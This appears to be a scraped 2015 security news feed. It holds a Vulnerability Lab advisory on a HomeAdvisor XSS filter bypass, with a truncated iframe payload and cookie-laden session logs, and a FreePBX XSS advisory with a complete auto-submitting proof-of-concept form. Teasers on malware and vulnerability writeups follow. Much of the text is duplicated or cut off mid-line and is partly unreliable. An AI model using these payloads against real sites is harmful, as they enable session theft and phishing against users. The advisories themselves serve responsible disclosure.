GET http://www.homeadvisor.com/sm/
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json]
Request Header:
Host[www.homeadvisor.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
X-Requested-With[
Referer[http://www.
Cookie[JSESSIONID=
TS01430915=
e643d80fda0a0524c6f1ba864d1cfd
3594daefa; TS01a79be6=
17e61b409e71572c0b74d600efcf5c
s_fid=610258AEEAC3DF17-
v71=%5B%5B%27Type-In%27%2C%
Type-In%27%2C%271426014538662%
s_dslv2=1426032535680; s_gnr=1426032535681-Repeat; s_gnr2=Repeat; s_vnum=1427839200456%26vn%3D8; s_visNum=8; s_ppv=10; v11=84.185.13.226; s_sq=smagic-smprod%3D%2526pid%
Profile%2526pidt%253D1%
fsr.s=%7B%22cp%22%3A%7B%
cost%2F%22%2C%22zipCode%22%3A%
CostGuide_Mobile_10_2014_SITE-
proAccepts%22%3A%220%22%2C%
58e6b%22%2C%22rt%22%3Afalse%
%22%2C%22pv%22%3A188%2C%22lc%
optimizelySegments=%7B%
optimizelyEndUserId=
__utma=65920055.115194839.
__ar_v4=
%3A20150309%3A188%
TS01527d1a=
ca02dbb0d79bdd0151355e51089499
fsr.r=%7B%22d%22%3A90%2C%22i%
s_sm_c43=0; s_xmdct=0; keyCode=46040820_
psdcn=1426017448504; csacn=746971; ServerID=218736832.20480.0000; fpv=1; s_dslv2_s=Less%20than%201%
_gig_email=admin%40evolution-
Connection[keep-alive]
Response Header:
Date[Wed, 11 Mar 2015 00:10:20 GMT]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Content-Type[application/json;
Set-Cookie[ServerID=218736832.
TS01430915=
d3a49b6712a2fbac5e643d80fda0a0
a80c8220d506f5f12622b0a1ea3626
Transfer-Encoding[chunked]
Reference(s):
http://www.homeadvisor.com/
http://www.homeadvisor.com/sm/
Solution - Fix & Patch:
=======================
The issue can be patched by a secure parse and encode of the exception output message after the input through the html file.
Restrict the input and disallow special chars or use a secure exception to prevent injection attacks.
Payload: </> %20%20%20``><iframe src=http://www.vulnerability-
Security Risk:
==============
The security risk of the client-side cross site scripting vulnerability in the exception and filter bypass issue are estimated as medium. (CVSS 3.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
===============
HomeAdvisor (Bug Bounty #1) - Filter Bypass & Client Side Exception Handling Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2015-04-21
Vulnerability Laboratory ID (VL-ID):
==============================
1452
Common Vulnerability Scoring System:
==============================
3.6
Product & Service Introduction:
==============================
HomeAdvisor is a website that lists pre-screened and customer-rated service professionals. The website also has tools, products, and resources
for home improvement, maintenance, and repair. HomeAdvisor is a subsidiary of IAC. Professionals in the HomeAdvisor network are pre-screened for
criminal records, bankruptcy issues, bad reviews, sex offenses, and cases of malpractice. Homeowners choose a category that matches their home
improvement needs, enter their full address or adjacent cross-streets and contact information and answer three pages of questions about their project.
(Copy of the Homepage: http://en.wikipedia.org/wiki/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a filter bypass and issue and client-side cross site scripting web vulnerability in the official homeadvisor web-application.
Vulnerability Disclosure Timeline:
==============================
2015-03-10: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2015-03-11: Vendor Notification (HomeAdvisor Inc - Security Research Team)
2015-03-26: Vendor Response/Feedback (HomeAdvisor Inc - Security Research Team)
2015-04-20: Vendor Fix/Patch (HomeAdvisor Inc - Developer Team)
2015-04-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
HomeAdvisor Inc
Product: HomeAdvisor - Web Application (Online Service) 2015 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
==============================
A non-persistent cross site scripting web vulnerability (client-side) and filter bypass issue has been discovered in the official HomeAdvisor web-application.
The security vulnerability allows remote attackers to execute client-side script code that compromises the homeadvisor web-application.
The client-side cross site scripting web vulnerability is located in the exception-handling comments context. Remote attackers are able to inject client-side
script code that executes in the web-application exception-handling. The request method to execute is GET and the attack vector is client-side. Remote attackers
are able to prepare special crafted urls with own script codes to compromise homeadvisor user session data in connection with client-side attacks.
The security risk of the client-side cross site scripting web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6.
Exploitation of the non-persistent web vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of
the vulnerabilities result in persistent phishing, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or
connected module context.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] rated.VipElectric.11975047.
Affected Parameter(s):
[+] sm/security/login/
Proof of Concept (PoC):
=======================
The client-side cross site scripting vulnerability and filter bypass issue can be exploited by remote attackers without privileged application user account
and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login to the service
2. Surf to for example (http://www.homeadvisor.com/
3. Inject splitted char payload to the input of the comments
4. Send the comment
5. An exception occurs with an error (An error has occurred, please try again later (400124)
6. Under the exception is the injected code
7. Now click to embed the stuff or use the share function
8. Successful reproduce of the vulnerability!
PoC: Payload(s)
</> %20%20%20"><iframe src=http://www.vulnerability-
--- PoC Session Logs [GET] (Execution) ---
1:10:13.175[555ms][total 555ms]
Status: 200[OK]
GET http://www.homeadvisor.com/sm/
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json]
Request Header:
Host[www.homeadvisor.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
X-Requested-With[
Referer[http://www.
Cookie[JSESSIONID=
TS01430915=
e643d80fda0a0524c6f1ba864d1cfd
3594daefa; TS01a79be6=
17e61b409e71572c0b74d600efcf5c
s_fid=610258AEEAC3DF17-
v71=%5B%5B%27Type-In%27%2C%
Type-In%27%2C%271426014538662%
s_dslv2=1426032535680; s_gnr=1426032535681-Repeat; s_gnr2=Repeat; s_vnum=1427839200456%26vn%3D8; s_visNum=8; s_ppv=10; v11=84.185.13.226; s_sq=smagic-smprod%3D%2526pid%
Profile%2526pidt%253D1%
fsr.s=%7B%22cp%22%3A%7B%
cost%2F%22%2C%22zipCode%22%3A%
CostGuide_Mobile_10_2014_SITE-
proAccepts%22%3A%220%22%2C%
58e6b%22%2C%22rt%22%3Afalse%
%22%2C%22pv%22%3A188%2C%22lc%
optimizelySegments=%7B%
optimizelyEndUserId=
__utma=65920055.115194839.
__ar_v4=
%3A20150309%3A188%
TS01527d1a=
ca02dbb0d79bdd0151355e51089499
fsr.r=%7B%22d%22%3A90%2C%22i%
s_sm_c43=0; s_xmdct=0; keyCode=46040820_
psdcn=1426017448504; csacn=746971; ServerID=218736832.20480.0000; fpv=1; s_dslv2_s=Less%20than%201%
_gig_email=admin%40evolution-
Connection[keep-alive]
Response Header:
Date[Wed, 11 Mar 2015 00:10:20 GMT]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Content-Type[application/json;
Set-Cookie[ServerID=218736832.
TS01430915=
d3a49b6712a2fbac5e643d80fda0a0
a80c8220d506f5f12622b0a1ea3626
Transfer-Encoding[chunked]
Reference(s):
http://www.homeadvisor.com/
http://www.homeadvisor.com/sm/
Solution - Fix & Patch:
=======================
The issue can be patched by a secure parse and encode of the exception output message after the input through the html file.
Restrict the input and disallow special chars or use a secure exception to prevent injection attacks.
Payload: </> %20%20%20``><iframe src=http://www.vulnerability-
Security Risk:
==============
The security risk of the client-side cross site scripting vulnerability in the exception and filter bypass issue are estimated as medium. (CVSS 3.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
↧
Janicab Hides Behind Undocumented LNK Functionality
Two years ago, we found a malware called Janicab. It targets both Mac and Windows OSes using Python and VBS scripts, respectively.
For Windows OS, this malware was delivered via a document that exploited CVE-2012-0158. In addition, we've also seen it delivered in a form of a Microsoft Shell Link (.lnk) file that drops an embedded encoded VBScript, sometime from 2013 until recently.
There are several tricks the dropper uses for obfuscating its purpose
more here.....https://www.f-secure.com/weblog/archives/00002803.html
For Windows OS, this malware was delivered via a document that exploited CVE-2012-0158. In addition, we've also seen it delivered in a form of a Microsoft Shell Link (.lnk) file that drops an embedded encoded VBScript, sometime from 2013 until recently.
There are several tricks the dropper uses for obfuscating its purpose
more here.....https://www.f-secure.com/weblog/archives/00002803.html
↧
How exploit packs are concealed in a Flash object
One of the most important features of a malicious attack is its ability to conceal itself from both protection solutions and victims. The main role in performing a hidden attack is played by exploits to software vulnerabilities that can be used to secretly download malicious code on the victim machine. Generally, exploits are distributed in exploit packs which appear in the form of plugin detects (to identify the type and version of software installed on the user computer) and a set of exploits, one of which is issued to the user if an appropriate vulnerability is found.
Recently, we have come across a new technique used to hide exploit-based attacks: fraudsters packed the exploit pack in the Flash file.
more here..........http://securelist.com/analysis/publications/69727/how-exploit-packs-are-concealed-in-a-flash-object/
Recently, we have come across a new technique used to hide exploit-based attacks: fraudsters packed the exploit pack in the Flash file.
more here..........http://securelist.com/analysis/publications/69727/how-exploit-packs-are-concealed-in-a-flash-object/
↧
Telephone Intercept recordings
This page contains a collection of recordings used by various telephone companies. Intercept recordings are recorded messages played when a call is not completed. One of the most common is the Not In Service (NIS) recording, used when someone dials a telephone number that isn't assigned to a customer. When first used, most recorded messages ended with "This is a recording" to let the caller know that they had not reached a live operator.
more here..........http://thephonebooth.com/intercept/index.html
more here..........http://thephonebooth.com/intercept/index.html
↧
↧
IIS At Risk: The HTTP Protocol Stack Vulnerability
Unpatched versions of Microsoft’s Internet Information Services (IIS) web server are vulnerable to a remote denial of service attack that can prove to be very threatening if set against critical systems.
The vulnerability, which was fixed by Microsoft in MS15-034 as part of the April 2015 Patch Tuesday cycle, can trigger the blue screen of death or more commonly known as BSOD. While there are no indications of possible remote code execution, it is still very important for users to apply the update, especially in systems that require 100% uptime.
The following versions of Windows are at risk:
Windows 7
Windows Server 2008 R2
Windows 8/8.1
Windows Server 2012/2012 R2
more here.........http://blog.trendmicro.com/trendlabs-security-intelligence/iis-at-risk-the-http-protocol-stack-vulnerability/
The vulnerability, which was fixed by Microsoft in MS15-034 as part of the April 2015 Patch Tuesday cycle, can trigger the blue screen of death or more commonly known as BSOD. While there are no indications of possible remote code execution, it is still very important for users to apply the update, especially in systems that require 100% uptime.
The following versions of Windows are at risk:
Windows 7
Windows Server 2008 R2
Windows 8/8.1
Windows Server 2012/2012 R2
more here.........http://blog.trendmicro.com/trendlabs-security-intelligence/iis-at-risk-the-http-protocol-stack-vulnerability/
↧
plupload - Same-Origin Method Execution [Wordpress 3.9 - 4.1.1]
This January I've found and reported XSS vulnerability in plupload, that affects Wordpress from 3.9 to 4.1.1. As far as there was no ability to control arguments of function called - the "only" thing we could do with this issue was Same-Origin Method Execution.
Before you start reading technical details - you should update your Wordpress / plupload first.
more here.......http://zoczus.blogspot.com/2015/04/plupload-same-origin-method-execution.html
Before you start reading technical details - you should update your Wordpress / plupload first.
more here.......http://zoczus.blogspot.com/2015/04/plupload-same-origin-method-execution.html
↧
Paper: Discovering Vulnerabilities In The Wild: An Empirical Study
There is little or no information available on what actually happens when a software
vulnerability is detected. We performed an empirical study on reporters of the three most
prominent security vulnerabilities: buffer overflow, SQL injection, and cross site scripting
vulnerabilities. The goal was to understand the methods and tools used during the discovery
and whether the community of developers exploring one security vulnerability differs—in
their approach—from another community of developers exploring a different vulnerability.
The reporters were featured in the SecurityFocus repository for 12 month periods for each
vulnerability. We collected 127 responses. We found that the communities differ based
on the security vulnerability they target; but within a specific community, reporters follow
similar approaches. We also found a serious problem in the vulnerability reporting process
that is common for all communities. Most reporters, especially the experienced ones, favor
full-disclosure and do not collaborate with the vendors of vulnerable software. They think
that the public disclosure, sometimes supported by a detailed exploit, will put pressure on
vendors to fix the vulnerabilities. But, in practice, the vulnerabilities not reported to vendors
are less likely to be fixed. Ours is the first study on vulnerability repositories that targets
the reporters of the most common security vulnerabilities, thus concentrating on the people
involved in the process; previous works have overlooked this rich information source. The
results are valuable for beginners exploring how to detect and report security vulnerabilities
and for tool vendors and researchers exploring how to automate and fix the process.
vulnerability is detected. We performed an empirical study on reporters of the three most
prominent security vulnerabilities: buffer overflow, SQL injection, and cross site scripting
vulnerabilities. The goal was to understand the methods and tools used during the discovery
and whether the community of developers exploring one security vulnerability differs—in
their approach—from another community of developers exploring a different vulnerability.
The reporters were featured in the SecurityFocus repository for 12 month periods for each
vulnerability. We collected 127 responses. We found that the communities differ based
on the security vulnerability they target; but within a specific community, reporters follow
similar approaches. We also found a serious problem in the vulnerability reporting process
that is common for all communities. Most reporters, especially the experienced ones, favor
full-disclosure and do not collaborate with the vendors of vulnerable software. They think
that the public disclosure, sometimes supported by a detailed exploit, will put pressure on
vendors to fix the vulnerabilities. But, in practice, the vulnerabilities not reported to vendors
are less likely to be fixed. Ours is the first study on vulnerability repositories that targets
the reporters of the most common security vulnerabilities, thus concentrating on the people
involved in the process; previous works have overlooked this rich information source. The
results are valuable for beginners exploring how to detect and report security vulnerabilities
and for tool vendors and researchers exploring how to automate and fix the process.
↧
Multiple Cross-Site Scripting (XSS) in FreePBX
Advisory ID: HTB23253
Product: FreePBX
Vendor: Sangoma Technologies
Vulnerable Version(s): 12.0.43 and probably prior
Tested Version: 12.0.43
Advisory Publication: March 18, 2015 [without technical details]
Vendor Notification: March 18, 2015
Vendor Patch: March 27, 2015
Public Disclosure: April 22, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-2690
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in FreePBX, which can be exploited to
perform Cross-Site Scripting (XSS) attacks against web application administrators. This vulnerability can be used to
steal administrator’s cookies, perform phishing and drive-by-download attacks.
1) Multiple XSS vulnerabilities in FreePBX: CVE-2015-2690
Input passed via multiple HTTP POST parameters to "/admin/config.php" script (when "type" is set to "setup", "display"
is set to "digiumaddons", "page" is set to "add-license-form", and "addon" is set to "ffa") is not properly sanitised
before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted
link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The vulnerable HTTP POST parameters are: "add_license_key", "add_license_first_name", "add_license_last_name",
"add_license_company", "add_license_address1", "add_license_address2", "add_license_city", "add_license_state",
"add_license_post_code", "add_license_country", "add_license_phone", and "add_license_email".
The exploitation example below will show JS pop-up displaying "ImmuniWeb":
<form action="http://[host]/admin/config.php?type=setup&display=digiumaddons&page=add-license-form&addon=ffa";
method="post" name="main">
<input type="hidden" name="add_license_key" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_first_name" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_last_name" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_company" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_address1" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_address2" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_city" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_state" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_post_code" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_country" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_phone" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_email" value='"><script>alert("ImmuniWeb");</script>'>
<input type="hidden" name="add_license_submit" value='Submit'>
<input type="submit" id="btn">
</form>
<script>document.main.submit()</script>
-----------------------------------------------------------------------------------------------
Solution:
Update Digium Addons Module of FreePBX installation to version 2.11.0.7
More Information:
http://git.freepbx.org/projects/FREEPBX/repos/digiumaddoninstaller/commits/2aad006024b74c9ff53943d3e68527a3dffac855
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23253 - https://www.htbridge.com/advisory/HTB23253 - Reflected Cross-Site Scripting
(XSS) in FreePBX.
[2] FreePBX - http://www.freepbx.org - FreePBX is as an open source, web-based PBX solution.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE
is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and
cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.
↧
↧
RSA 2015: Tuesday – Into Darkness
Tuesday is the big day at RSA. The keynotes begin, the sessions ramp up, and the expo floor buzz hits maximum. Amongst all this excitement, emerges a troubling reminder of the dark side of RSA.
The RSA Conference is both the creator and the child of its own sensationalist noise. This infinite regression problem is comprised of speakers, who promote FUD for attention, and attendees who voraciously consume whatever FUD you give them. This of course inspires more FUD, perpetuating the Circle of FUD.
However, FUD got a kick in the pants this morning. It starts with the opening keynote.
more here.......https://blog.anitian.com/rsa-2015-tuesday-into-darkness/
The RSA Conference is both the creator and the child of its own sensationalist noise. This infinite regression problem is comprised of speakers, who promote FUD for attention, and attendees who voraciously consume whatever FUD you give them. This of course inspires more FUD, perpetuating the Circle of FUD.
However, FUD got a kick in the pants this morning. It starts with the opening keynote.
more here.......https://blog.anitian.com/rsa-2015-tuesday-into-darkness/
↧
“No iOS Zone” - A New Vulnerability Allows DoS Attacks on iOS Devices
In today’s RSA Conference presentation, (Tuesday, April 21, 2015 | 3:30 PM – 4:20 PM | West | Room: 2001) Adi Sharabani, CEO and my fellow co-founder at Skycure, and I covered the lifecycle of vulnerabilities and vendor pitfalls. We also shared some details about a vulnerability our team recently identified in iOS 8 — a vulnerability that we are currently working with Apple to fix.
In this post, I’d like to share a few anecdotes from our vulnerability research process here.....https://www.skycure.com/blog/ios-shield-allows-dos-attacks-on-ios-devices/
In this post, I’d like to share a few anecdotes from our vulnerability research process here.....https://www.skycure.com/blog/ios-shield-allows-dos-attacks-on-ios-devices/
↧
Good Article: Deep dive into QUANTUM INSERT (Includes how to detect this NSA attack with Intrusion Detection Systems like Bro, Snort and Suricata
QUANTUMINSERT (QI) is actually a relatively old technique. In order to exploit it, you will need a monitoring capabilities to leak information of observed TCP sessions and a host that can send spoofed packets. Your spoofed packet also needs to arrive faster than the original packet to be able to successful.
more here..........http://blog.fox-it.com/2015/04/20/deep-dive-into-quantum-insert/
more here..........http://blog.fox-it.com/2015/04/20/deep-dive-into-quantum-insert/
↧